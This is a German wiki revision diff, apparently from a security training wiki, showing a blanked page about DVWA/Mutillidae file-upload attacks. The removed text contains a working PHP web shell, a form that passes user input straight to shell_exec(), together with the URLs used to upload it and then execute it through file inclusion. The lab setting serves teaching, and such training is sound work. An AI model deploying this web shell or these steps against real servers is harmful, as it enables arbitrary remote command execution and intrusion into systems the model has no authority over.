DVWA File Upload Kommando Ausführung: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
(Die Seite wurde neu angelegt: „=file.php= ;Dieser PHP File so später Kommandos ausführen <pre> <form action="" method="post" enctype="application/x-www-form-urlencoded"> <table style="mar…“)
 
(Die Seite wurde geleert.)
Markierung: Geleert
 
Zeile 1: Zeile 1:
=file.php=
 
;Dieser PHP File so später Kommandos ausführen
 
<pre>
 
<form action="" method="post" enctype="application/x-www-form-urlencoded">
 
<table style="margin-left:auto; margin-right:auto;">
 
<tr>
 
<td colspan="2" style="text-align:center; font-weight: bold;color: #770000;">
 
Please enter system command
 
</td>
 
</tr>
 
<tr><td>&nbsp;</td></tr>
 
<tr>
 
<td style="font-weight: bold;">Command</td>
 
<td><input type="text" name="pCommand" size="50"></td>
 
</tr>
 
<tr><td>&nbsp;</td></tr>
 
<tr>
 
<td colspan="2" style="text-align:center;">
 
<input type="submit" value="Execute Command" />
 
</td>
 
</tr>
 
</table>
 
</form>
 
<?php
 
if (isset($_REQUEST["pCommand"])) {
 
echo "<nowiki><pre></nowiki>";
 
echo shell_exec($_REQUEST["pCommand"]);
 
echo "</pree>";
 
}//end if
 
?>
 
</pre>
 
  
=Upload File=
 
*https://owasp.willux.de/mutillidae/index.php?page=upload-file.php
 
=Datei aufrufen=
 
*https://owasp.willux.de/mutillidae/index.php?page=/tmp/file.php
 
=Kommando aufrufen=
 
[[Datei:Dvwa-3.png]]
 

Aktuelle Version vom 16. Juni 2021, 20:54 Uhr

Abgerufen von „http://wiki.ixheim.de/index.php?title=DVWA_File_Upload_Kommando_Ausführung&oldid=24246